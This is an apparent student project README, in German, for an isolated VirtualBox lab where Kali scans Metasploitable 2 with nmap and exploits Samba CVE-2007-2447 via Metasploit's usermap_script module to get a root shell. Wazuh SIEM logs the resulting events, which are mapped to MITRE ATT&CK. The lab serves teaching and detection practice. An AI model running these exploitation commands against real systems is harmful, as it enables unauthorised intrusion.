
Isoliertes AD/Linux-Angriffslabor: CVE-2007-2447 über Metasploit ausgenutzt, mit Wazuh SIEM erkannt, auf MITRE ATT&CK (T1190, T1059) abgebildet
B.Tech-Projekt (BTP) | IIIT Pune Basierend auf: „Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023, IIT Delhi
Ein voll funktionsfähiges Cybersecurity-Heimlabor auf einem einzigen Rechner, aufgebaut mit freien und Open-Source-Tools. Das Labor simuliert einen realistischen Angriffslebenszyklus — Reconnaissance → Exploitation → Detection — und zeigt, wie ein SIEM Angriffe in Echtzeit erkennen und der MITRE ATT&CK-Matrix zuordnen kann.
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard-Zugriff über den Browser
| VM | Rolle | IP | Tools |
|---|---|---|---|
| Kali Linux 2026.1 | Angreifer | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | Opfer | 10.0.0.2 | 20+ Schwachstellen |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
| Tool | Version | Zweck |
|---|---|---|
| VirtualBox | 7.x | Hypervisor — betreibt alle VMs auf einem Host |
| Kali Linux | 2026.1 | Penetrationstest-Betriebssystem (offensiv) |
| Metasploitable 2 | v2.0 | Absichtlich verwundbares Zielsystem |
| Wazuh | v4.7.5 | Open-Source-SIEM (defensiv) |
| Nmap | Aktuell | Netzwerk-/Portscanning |
| Metasploit Framework | Aktuell | Exploitation-Framework |
Erstellen Sie ein Internal Network namens cyberlab in VirtualBox. Alle drei VMs erhalten diesen Adapter. Die Ubuntu-/Wazuh-VM erhält zusätzlich einen Host-Only-Adapter, damit Sie das Dashboard über Ihren Browser erreichen können.
cyberlab-Internal-Network-Adapter zu# /etc/network/interfaces bearbeiten
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab-Netzwerk zuweisen# /etc/network/interfaces bearbeiten
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ Setzen Sie Metasploitable 2 niemals dem Internet aus. Es ist absichtlich unsicher.
cyberlab intern + Host-Only/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103 (über den Host-Browser)Da Metasploitable 2 keinen Wazuh-Agenten ausführen kann, konfigurieren Sie Syslog-Forwarding für agentenloses Monitoring:
Auf Metasploitable in /etc/rsyslog.conf hinzufügen:
*.* @10.0.0.3:514
Auf Wazuh (Ubuntu) den Syslog-Eingang in /var/ossec/etc/ossec.conf aktivieren:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
Wazuh neu starten: sudo systemctl restart wazuh-manager
# Von Kali aus
nmap -sV -O 10.0.0.2
Wichtige auf Metasploitable 2 entdeckte Dienste:
| Port | Dienst | Version |
|---|---|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
20+ offene Ports entdeckt. OS identifiziert: Linux 2.6.x
Schwachstelle: CVE-2007-2447 — Samba usermap_script Command Injection
Ermöglicht nicht authentifizierte Remote-Codeausführung über manipulierte MS-RPC-Anfragen bei Samba 3.0.0–3.0.25rc3.
# Von Kali aus — Metasploit starten
msfconsole
# Innerhalb von Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Root-Zugriff verifizieren
whoami
# Ausgabe: root
Nach dem Exploit erkannte Wazuh die Ereignisse automatisch und ordnete sie MITRE ATT&CK zu:
| Regel-ID | Beschreibung | MITRE-Technik | Taktik |
|---|---|---|---|
| 5402 | Erfolgreiches sudo zu ROOT ausgeführt | T1548.003 | Privilege Escalation |
| 5501 | PAM: Login-Sitzung geöffnet | T1078 | Initial Access / Persistence |
| 5502 | PAM: Login-Sitzung geschlossen | T1078 | Defense Evasion |
| 502 | Wazuh-Server gestartet | — | Erkennung aktiv |
Erkannte Ereignisse gesamt: 55+
Dashboard aufrufen unter https://192.168.56.103 → Security Events → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← Sie sind hier
├── network-config/
│ ├── kali-interfaces.txt ← Kali-IP-Konfiguration (statisch)
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu-/SIEM-netplan-Konfiguration
├── wazuh-config/
│ └── ossec.conf ← Wazuh-Syslog-/Agent-Konfiguration
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Referenz-Forschungspapier
Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.
Dieses Labor ist vollständig auf isolierten virtuellen Maschinen aufgebaut und hat während der Angriffssimulationen keinen Internetzugriff. Alle Tools und Techniken werden ausschließlich für Bildungszwecke in einer kontrollierten Umgebung eingesetzt. Versuchen Sie nicht, Angriffstechniken auf Systemen zu replizieren, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Präsentiert von Harshita Verma | IIIT Pune